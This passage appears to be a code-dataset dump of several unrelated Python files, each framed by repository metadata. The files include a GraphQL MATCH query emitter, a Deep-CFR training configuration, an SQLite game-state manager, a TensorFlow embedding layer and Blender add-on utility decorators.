if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | 35.741935 | 115 | 0.730144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.258123 |
c79467938af160abb2d49f1add583ea15a8cc080 | 8,019 | py | Python | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
| null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
| null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
| null | null | null | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | 52.411765 | 152 | 0.775907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,872 | 0.233446 |
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| 54.766667 | 119 | 0.370663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 263 | 0.080037 |
c7964aa0abe4f31ae2f01cae5205b2c444d9f154 | 8,436 | py | Python | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
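# Turn cycle implied by next_state (guest and host alternate roles):
#   WAITING_FOR_HOST -> GUEST_CHOOSING -> HOST_GUESSING -> HOST_CHOOSING
#   -> GUEST_GUESSING -> GUEST_CHOOSING -> ...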
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None
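if __name__ == '__main__':
    # Usage sketch (an assumption, not part of the original module):
    # exercise the schema against an in-memory SQLite database.
    mgr = state_mgr(':memory:')
    game, host_session = mgr.create_game('host player')
    guest_session = mgr.join_game(game, 'guest player')
    print(mgr.resume_session(host_session))  # (game_id, 1, 0, 'host player')
    mgr.close()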
| 36.838428 | 159 | 0.580844 | 7,839 | 0.929232 | 0 | 0 | 0 | 0 | 0 | 0 | 3,965 | 0.470009 |
c79748fa89a41d17ad6e31fcee8a32474231a1c4 | 27 | py | Python | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | """Tests for callables."""
| 13.5 | 26 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.962963 |
c799f39a2d11cd8cf47042ccb70ce866c8193b11 | 191 | py | Python | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
]
| 24 | 2019-03-07T20:24:24.000Z | 2022-03-23T17:58:00.000Z | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
]
| 32 | 2019-02-14T03:46:31.000Z | 2022-03-23T00:01:28.000Z | dss/dss_capi_ir/__init__.py | PMeira/dss_python | 2dbc72ed875108d3f98d21cb0a488bab6b0d7f4c | [
"BSD-3-Clause"
]
| 5 | 2019-02-19T04:54:49.000Z | 2022-03-23T10:40:51.000Z | '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 Paulo Meira
'''
from __future__ import absolute_import
from .IDSS import IDSS
| 23.875 | 83 | 0.78534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.670157 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
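# Usage sketch (assumes the Component base class needs no further setup;
# not part of the original file):
#   layer = EmbeddingLayer(input_size=1000, output_size=64)
#   ids = tf.placeholder(tf.int32, [None])       # a batch of integer ids
#   vectors = layer(ids)                         # -> [batch, 64] float32
#   with tf.Session() as sess:
#       sess.run(tf.global_variables_initializer())
#       print(sess.run(vectors, {ids: [1, 2, 3]}).shape)  # (3, 64)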
| 27.72 | 78 | 0.681097 | 585 | 0.844156 | 0 | 0 | 100 | 0.1443 | 0 | 0 | 29 | 0.041847 |
c79bb693d6ca4d67f78e8585c83eae0b233a16e3 | 76 | py | Python | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 1 | 2021-12-09T04:27:33.000Z | 2021-12-09T04:27:33.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 2 | 2021-12-09T08:47:12.000Z | 2022-03-25T16:07:56.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 1 | 2022-03-23T13:53:54.000Z | 2022-03-23T13:53:54.000Z | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | 76 | 76 | 0.855263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c79c07c8078e5f1d72628e2e7fc0c80e75f6489c | 12,955 | py | Python | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| 1 | 2022-01-10T23:40:21.000Z | 2022-01-10T23:40:21.000Z | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| null | null | null | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| null | null | null | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
[email protected]
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
    return fn  # stats collection is disabled; the instrumentation below never runs
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
    return  # reporting is disabled; the code below never runs
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
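# Usage sketch (not part of the original module): decorate a function to time
# each call; nested decorated calls print their timings indented.
#   @timed_call('expensive step')
#   def work():
#       ...
#   work()  # prints e.g. "Timing expensive step: 0.1234s"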
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
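# Usage sketch (illustrative, not from the original source): register
# version-specific implementations under one name and let calls dispatch to
# whichever variant matched the running Blender version at decoration time:
#   @blender_version_wrapper('<', '2.80')
#   def get_active(ctx): return ctx.scene.objects.active
#   @blender_version_wrapper('>=', '2.80')
#   def get_active(ctx): return ctx.view_layer.objects.active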
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
                assert fn, f'Could not find appropriate function named {fn_name} for Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
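# Example usage (sketch): emit a notice only on the first call:
#     @warn_once('old_api() is deprecated; use new_api() instead')
#     def old_api(): ...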
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
